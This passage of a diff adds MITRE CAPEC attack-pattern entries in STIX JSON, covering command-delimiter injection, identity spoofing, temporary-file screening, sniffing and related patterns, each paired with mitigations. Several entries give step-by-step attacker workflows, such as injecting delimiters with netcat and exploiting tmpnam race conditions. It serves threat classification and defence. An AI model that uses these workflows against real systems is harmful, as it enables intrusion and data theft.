McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Command Delimiters", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior.\n LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. 
When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Assess Target Runtime Environment: In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters.

  2. Techniques
    Port mapping using network connection-based software (e.g., nmap, nessus, etc.)
    Port mapping by exploring the operating system (netstat, sockstat, etc.)
    TCP/IP Fingerprinting
    Induce errors to find informative error messages
  3. Survey the Application: The attacker surveys the target application, possibly as a valid and authenticated user

  4. Techniques
    Spidering web sites for all available links
    Inventory all application inputs

Experiment

  1. Attempt delimiters in inputs: The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time.

  2. Techniques
    Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
    Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
    Enter command delimiters directly in input fields.

Exploit

  1. Use malicious command delimiters: The attacker uses combinations of payload and carefully placed command delimiters to attack the software.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_prerequisites": [ + "Software's input validation or filtering must not detect and block presence of additional malicious command." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Medium": "The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform allowlist validation against a positive specification for command length, type, and parameters.", + "id": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account", + "id": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ab83c6e-5e54-4214-be2d-b4a9cb52405f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--461e2128-8614-4665-acaa-4090f980504d", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content.", + "id": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78b9961e-bbb1-4c40-9286-e4eedbba14bc", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use type conversions such as JDBC prepared statements.", + "id": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18b1ee44-40f2-43f7-97d1-56bde0108bbd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. 
For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.", + "external_references": [ + { + "external_id": "CAPEC-150", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "OS Credential Dumping", + "external_id": "T1003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1003" + }, + { + "description": "Automated Collection", + "external_id": "T1119", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1119" + }, + { + "description": "Data from Information Repositories", + "external_id": "T1213", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1213" + }, + { + "description": "Data from Cloud Storage Object", + "external_id": "T1530", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1530" + }, + { + "description": "Credentials from Password Stores", + "external_id": "T1555", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555" + 
}, + { + "description": "Data from Configuration Repository", + "external_id": "T1602", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1602" + } + ], + "id": "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Collect Data from Common Resource Locations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device’s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7" + ], + "x_capec_prerequisites": [ + "The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.", + "external_references": [ + { + "external_id": "CAPEC-151", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/151.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + } + ], + "id": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Identity Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + 
"attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. 
In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5", + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119", + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_prerequisites": [ + "The identity associated with the message or resource must be removable or modifiable in an undetectable way." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust authentication processes (e.g., multi-factor authentication).", + "id": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-151-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e224ed0-2d80-495f-925d-d726a7fe4f81", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "spec_version": "2.1", + "target_ref": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target.", + "external_references": [ + { + "external_id": "CAPEC-153", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/153.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Input Data Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. 
This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_prerequisites": [ + "The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. 
By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.", + "external_references": [ + { + "external_id": "CAPEC-154", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Resource Location Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_prerequisites": [ + "None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor network activity to detect any anomalous or unauthorized communication exchanges.", + "id": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-154-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "spec_version": "2.1", + "target_ref": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. 
If the content contains sensitive information then the adversary could recover this from the web cache.", + "external_references": [ + { + "external_id": "CAPEC-155", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/155.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Screen Temporary Files for Sensitive Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Look for temporary files in target application: An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information.

Experiment

  1. Attempt to read temporary files: An adversary will attempt to read any temporary files they may have discovered through normal means.

  2. Techniques
    Attempt to get the file by querying the file path to a web server
    Using a remote shell into an application, read temporary files and send out information remotely if necessary
    Recover temporary information from a user's browser cache

Exploit

  1. Use function weaknesses to gain access to temporary files: If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.

  2. Techniques
    Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.
    Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must utilize temporary files and must fail to adequately secure them against other parties reading them." + ], + "x_capec_resources_required": [ + "Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. 
AiTM attacks are predominantly active and often alter the content of the communications themselves.", + "external_references": [ + { + "external_id": "CAPEC-157", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + } + ], + "id": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Sniffing Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

  2. Techniques
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary positions themselves somewhere in the middle of the two components. If the communication is encrypted, the adversary will need to act as a proxy and route traffic between the components, exploiting a flaw in the encryption mechanism. Otherwise, the adversary can just observe the communication at either end.

  2. Techniques
    Use Wireshark or some other packet capturing tool to capture traffic on a network.
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Listen to Communication: The adversary observes communication, but does not alter or block it. The adversary gains access to sensitive information and can potentially utilize this information in a malicious way.

", + "x_capec_parent_of_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2", + "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4" + ], + "x_capec_prerequisites": [ + "The target data stream must be transmitted on a medium to which the adversary has access." + ], + "x_capec_resources_required": [ + "The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception.", + "id": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-157-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5d6642-3556-4d29-8f30-07ab3be9ab1a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "spec_version": "2.1", + "target_ref": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + 
"type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.", + "external_references": [ + { + "external_id": "CAPEC-158", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + }, + { + "description": "Multi-Factor Authentication 